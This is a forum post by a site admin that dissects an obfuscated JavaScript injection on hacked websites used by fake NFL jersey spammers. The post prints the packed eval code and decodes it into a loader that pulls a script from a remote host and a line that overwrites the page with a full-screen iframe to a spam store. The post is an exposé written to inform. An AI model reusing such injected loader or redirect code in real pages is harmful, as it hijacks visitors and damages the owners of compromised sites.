Clicky
Last visit was: Sat Jul 05, 2014 4:52 pm
It is currently Sat Jul 05, 2014 4:52 pm

Our "Esteemed Guests" processes


All times are UTC - 5 hours [ DST ]


 [ 1 post ] 
Author Message
 PostPosted: Tue Jul 30, 2013 5:03 pm   
Site Admin
User avatar

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
Check out the massive loop these fake NFL jersey spammers put everyone through whenever they post massive amounts of spam to forums around the world...

Our ridiculous Chinese "cheap NFL jersey" high-volume spammer keeps coming back, and he keeps posting dozens to hundreds of hacked server links.

The pattern goes:

JavaScript Obfuscation injected onto a hacked domain:

http://www.herzoghospital.org/site/news/cheap-nfl-jerseys.html

Code:
<script language="javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('c 1=3.4(\'9\');1.a(\'b\',\'5://d.8.0.2/6.7\');',62,14,'1qidc|a|com|document|getElementById|http|jquery|js|kr3|ourjs|setAttribute|src|var|xiaofengfeng'.split('|'),0,{}))
</script>


Step 1: load secondary obfuscated JavaScript:

Code:
var a=document.getElementById('ourjs');a.setAttribute('src','http://xiaofengfeng.kr3.1qidc.com/jquery.js');

http://xiaofengfeng.kr3.1qidc.com/jquery.js

Code:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=
k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6.7.8.5="<4 1=\'2%\' 3=\'9\' a=\'i\' g=\'0\' f=\'e://b.c.d.h/\'>";',19,19,'|width|100|scrolling|iframe|innerHTML|top|document|body|no|height|www|jerseyscheap|us|
http|src|frameborder|com|2000'.split('|'),0,{}))


Step 2: Eval that function to send the user to the actual target domain:

Code:
top.document.body.innerHTML="<iframe width='100%' scrolling='no' height='2000' frameborder='0' src='http://www.jerseyscheap.us.com/'>";

http://www.jerseyscheap.us.com/

Phew.

What a runaround.

You know that phrase about being a good businessman? "Don't sh*t where you eat?" These guys sh*t where everybody eats. They're complete scumbags. They don't care if they end up getting thousands of hosting agreements cancelled or destroy a significant number of otherwise harmless sites owned by unsuspecting operators.

And nobody will shut any of this down. It's depressing.

SiL


Top
 Profile  
 [ 1 post ] 

All times are UTC - 5 hours [ DST ]


Who is online

Users browsing this forum: Wayback machine, Yandex [Bot] and 1 guest


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  


Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Style originally created by Volize © 2003 • Redesigned SkyLine by MartectX © 2008